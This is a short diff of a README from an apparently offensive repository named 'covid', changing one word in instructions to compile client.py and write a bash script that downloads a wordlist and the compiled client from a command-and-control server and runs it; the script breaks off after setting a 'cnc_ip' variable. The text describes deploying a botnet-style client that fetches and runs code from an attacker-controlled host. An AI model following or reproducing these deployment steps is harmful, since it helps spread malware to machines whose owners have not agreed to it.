MrScytheLULZ/covid/README.md

 for example:

-use a python compiler to compile client.py, then create a bash script that downloads the used wordlist, the compiled client and runs the client:
+use a python compiler to compile client.py, then create a bash script that downloads the chosen wordlist, the compiled client and runs the client:
 ```
 #!/bin/bash
 cnc_ip="your cnc"